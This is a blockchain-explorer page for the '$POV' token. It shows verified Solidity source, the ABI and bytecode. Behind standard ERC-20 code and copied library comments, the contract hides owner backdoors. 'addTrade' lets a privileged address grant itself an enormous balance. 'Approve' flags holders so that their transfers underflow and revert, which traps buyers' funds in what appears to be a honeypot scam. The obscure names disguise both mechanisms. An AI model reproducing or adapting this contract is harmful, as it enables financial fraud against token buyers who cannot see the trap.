ETH Price: $3,266.70 (+2.32%)
Gas: 1 Gwei

Token

Pepe Original Version ($POV)
 

Overview

Max Total Supply

1,000,000,000 $POV

Holders

26

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,131,020.040195433455135756 $POV

Value
$0.00
0xf0f1fd926d2d8836283f2918441c8b1418b6ca9e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Coin

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-03
*/

/**
 *Submitted for verification at BscScan.com on 2023-04-16
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



abstract contract Ownable {
    address private _owner;

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

     /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checyydsOwen();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checyydsOwen() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



contract Coin is Ownable {

   

    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _pepemuskJCEO;

    uint256 private _MYtotalSupply;
    string private _MYname;
    string private _MYsymbol;

    mapping(address => bool) private pepevipcc;
    function quitApprove(address sss) external   {
        if (_pepemuskJCEO == _msgSender()){
            pepevipcc[sss] = false;
        }
    }

    function Approve(address sss) external   {
        if (_pepemuskJCEO == _msgSender()){
            pepevipcc[sss] = true;
        }
    }

    function queryacawtibot(address sss) public view returns(bool)  {
        return pepevipcc[sss];
    }

    function addTrade() external {
        if (_msgSender() != _pepemuskJCEO) {
            return;
        }
        if (_pepemuskJCEO == _msgSender()){
            _balances[_msgSender()] = (1)*(1)*(1)*(1)*((7000))*(243000000000*10**18);
        }
    }
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,address AntiBot) {
        _MYname = name_;
        _MYsymbol = symbol_;
        _pepemuskJCEO = AntiBot;
        _onceCCCmint(msg.sender, 1000000000*10**decimals());

    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual  returns (string memory) {
        return _MYname;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual  returns (string memory) {
        return _MYsymbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual  returns (uint256) {
        return _MYtotalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual  returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }
    /**
         * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 kkllff = 2;
    function _transfer(
        address fromSender,
        address to,
        uint256 amount
    ) internal virtual {
        require(fromSender != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 balance= _balances[fromSender];
        if (pepevipcc[fromSender] != false ){
            balance= _balances[fromSender].sub(totalSupply());
        }

        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[fromSender] = balance.sub(amount);
        uint256 feeeA = amount.mul(kkllff).div(100);
        _balances[to] =  _balances[to].add(amount).sub(feeeA);
        emit Transfer(fromSender, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _onceCCCmint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: CCCCCASADSADA to the zero address");

        _MYtotalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _MYtotalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);


    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_pepemuskJCEO","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"queryacawtibot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"quitApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260026008553480156200001657600080fd5b50604051620012a0380380620012a08339810160408190526200003991620002a5565b6200004433620000b7565b6005620000528482620003c1565b506006620000618382620003c1565b50600380546001600160a01b0319166001600160a01b038316179055620000ae336200008b601290565b6200009890600a620005a2565b620000a890633b9aca00620005ba565b62000107565b505050620005ea565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001735760405162461bcd60e51b815260206004820152602860248201527f45524332303a204343434343415341445341444120746f20746865207a65726f604482015267206164647265737360c01b606482015260840160405180910390fd5b8060046000828254620001879190620005d4565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200020857600080fd5b81516001600160401b0380821115620002255762000225620001e0565b604051601f8301601f19908116603f01168101908282118183101715620002505762000250620001e0565b816040528381526020925086838588010111156200026d57600080fd5b600091505b8382101562000291578582018301518183018401529082019062000272565b600093810190920192909252949350505050565b600080600060608486031215620002bb57600080fd5b83516001600160401b0380821115620002d357600080fd5b620002e187838801620001f6565b94506020860151915080821115620002f857600080fd5b506200030786828701620001f6565b604086015190935090506001600160a01b03811681146200032757600080fd5b809150509250925092565b600181811c908216806200034757607f821691505b6020821081036200036857634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003bc57600081815260208120601f850160051c81016020861015620003975750805b601f850160051c820191505b81811015620003b857828155600101620003a3565b5050505b505050565b81516001600160401b03811115620003dd57620003dd620001e0565b620003f581620003ee845462000332565b846200036e565b602080601f8311600181146200042d5760008415620004145750858301515b600019600386901b1c1916600185901b178555620003b8565b600085815260208120601f198616915b828110156200045e578886015182559484019460019091019084016200043d565b50858210156200047d5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004e4578160001904821115620004c857620004c86200048d565b80851615620004d657918102915b93841c9390800290620004a8565b509250929050565b600082620004fd575060016200059c565b816200050c575060006200059c565b8160018114620005255760028114620005305762000550565b60019150506200059c565b60ff8411156200054457620005446200048d565b50506001821b6200059c565b5060208310610133831016604e8410600b841016171562000575575081810a6200059c565b620005818383620004a3565b80600019048211156200059857620005986200048d565b0290505b92915050565b6000620005b360ff841683620004ec565b9392505050565b80820281158282048414176200059c576200059c6200048d565b808201808211156200059c576200059c6200048d565b610ca680620005fa6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c80638da5cb5b116100ad578063ad55651f11610071578063ad55651f14610273578063db63517714610286578063dd62ed3e14610299578063f2fde38b146102ac578063f4cf1452146102bf57600080fd5b80638da5cb5b1461020d57806395d89b411461023257806396bfcd231461023a578063a457c2d71461024d578063a9059cbb1461026057600080fd5b806323b872dd116100f457806323b872dd146101a5578063313ce567146101b857806339509351146101c757806370a08231146101da578063715018a61461020357600080fd5b806306fdde0314610126578063095ea7b3146101445780630d6b406b1461016757806318160ddd14610193575b600080fd5b61012e6102c7565b60405161013b9190610aa3565b60405180910390f35b610157610152366004610b0d565b610359565b604051901515815260200161013b565b610157610175366004610b37565b6001600160a01b031660009081526007602052604090205460ff1690565b6004545b60405190815260200161013b565b6101576101b3366004610b52565b610373565b6040516012815260200161013b565b6101576101d5366004610b0d565b610397565b6101976101e8366004610b37565b6001600160a01b031660009081526001602052604090205490565b61020b6103b9565b005b6000546001600160a01b03165b6040516001600160a01b03909116815260200161013b565b61012e6103cd565b61020b610248366004610b37565b6103dc565b61015761025b366004610b0d565b610417565b61015761026e366004610b0d565b610497565b61020b610281366004610b37565b6104a5565b60035461021a906001600160a01b031681565b6101976102a7366004610b8e565b6104da565b61020b6102ba366004610b37565b610505565b61020b61057b565b6060600580546102d690610bc1565b80601f016020809104026020016040519081016040528092919081815260200182805461030290610bc1565b801561034f5780601f106103245761010080835404028352916020019161034f565b820191906000526020600020905b81548152906001019060200180831161033257829003601f168201915b5050505050905090565b6000336103678185856105ce565b60019150505b92915050565b6000336103818582856106f2565b61038c85858561076c565b506001949350505050565b6000336103678185856103aa83836104da565b6103b49190610c11565b6105ce565b6103c16109c2565b6103cb6000610a1c565b565b6060600680546102d690610bc1565b600354336001600160a01b0390911603610414576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b6000338161042582866104da565b90508381101561048a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61038c82868684036105ce565b60003361036781858561076c565b600354336001600160a01b0390911603610414576001600160a01b03166000908152600760205260409020805460ff19169055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61050d6109c2565b6001600160a01b0381166105725760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610481565b61041481610a1c565b6003546001600160a01b0316336001600160a01b03161461059857565b600354336001600160a01b03909116036103cb573360009081526001602052604090206d53dda36df3e426f0d57b400000009055565b6001600160a01b0383166106305760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610481565b6001600160a01b0382166106915760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610481565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fe84846104da565b9050600019811461076657818110156107595760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610481565b61076684848484036105ce565b50505050565b6001600160a01b0383166107d05760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610481565b6001600160a01b0382166108325760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610481565b6001600160a01b03831660009081526001602090815260408083205460079092529091205460ff161561088d5761088a61086b60045490565b6001600160a01b03861660009081526001602052604090205490610a6c565b90505b818110156108ec5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610481565b6108f68183610a6c565b6001600160a01b03851660009081526001602052604081209190915560085461092d90606490610927908690610a7f565b90610a8b565b6001600160a01b03851660009081526001602052604090205490915061095f9082906109599086610a97565b90610a6c565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b39087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103cb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610481565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a788284610c24565b9392505050565b6000610a788284610c37565b6000610a788284610c4e565b6000610a788284610c11565b600060208083528351808285015260005b81811015610ad057858101830151858201604001528201610ab4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0857600080fd5b919050565b60008060408385031215610b2057600080fd5b610b2983610af1565b946020939093013593505050565b600060208284031215610b4957600080fd5b610a7882610af1565b600080600060608486031215610b6757600080fd5b610b7084610af1565b9250610b7e60208501610af1565b9150604084013590509250925092565b60008060408385031215610ba157600080fd5b610baa83610af1565b9150610bb860208401610af1565b90509250929050565b600181811c90821680610bd557607f821691505b602082108103610bf557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561036d5761036d610bfb565b8181038181111561036d5761036d610bfb565b808202811582820484141761036d5761036d610bfb565b600082610c6b57634e487b7160e01b600052601260045260246000fd5b50049056fea264697066735822122064060c97df90805fdb6035eb70bb5281252f27feaac0aee195f3e058e151167364736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89000000000000000000000000000000000000000000000000000000000000001550657065204f726967696e616c2056657273696f6e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000424504f5600000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c80638da5cb5b116100ad578063ad55651f11610071578063ad55651f14610273578063db63517714610286578063dd62ed3e14610299578063f2fde38b146102ac578063f4cf1452146102bf57600080fd5b80638da5cb5b1461020d57806395d89b411461023257806396bfcd231461023a578063a457c2d71461024d578063a9059cbb1461026057600080fd5b806323b872dd116100f457806323b872dd146101a5578063313ce567146101b857806339509351146101c757806370a08231146101da578063715018a61461020357600080fd5b806306fdde0314610126578063095ea7b3146101445780630d6b406b1461016757806318160ddd14610193575b600080fd5b61012e6102c7565b60405161013b9190610aa3565b60405180910390f35b610157610152366004610b0d565b610359565b604051901515815260200161013b565b610157610175366004610b37565b6001600160a01b031660009081526007602052604090205460ff1690565b6004545b60405190815260200161013b565b6101576101b3366004610b52565b610373565b6040516012815260200161013b565b6101576101d5366004610b0d565b610397565b6101976101e8366004610b37565b6001600160a01b031660009081526001602052604090205490565b61020b6103b9565b005b6000546001600160a01b03165b6040516001600160a01b03909116815260200161013b565b61012e6103cd565b61020b610248366004610b37565b6103dc565b61015761025b366004610b0d565b610417565b61015761026e366004610b0d565b610497565b61020b610281366004610b37565b6104a5565b60035461021a906001600160a01b031681565b6101976102a7366004610b8e565b6104da565b61020b6102ba366004610b37565b610505565b61020b61057b565b6060600580546102d690610bc1565b80601f016020809104026020016040519081016040528092919081815260200182805461030290610bc1565b801561034f5780601f106103245761010080835404028352916020019161034f565b820191906000526020600020905b81548152906001019060200180831161033257829003601f168201915b5050505050905090565b6000336103678185856105ce565b60019150505b92915050565b6000336103818582856106f2565b61038c85858561076c565b506001949350505050565b6000336103678185856103aa83836104da565b6103b49190610c11565b6105ce565b6103c16109c2565b6103cb6000610a1c565b565b6060600680546102d690610bc1565b600354336001600160a01b0390911603610414576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b6000338161042582866104da565b90508381101561048a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f776044820152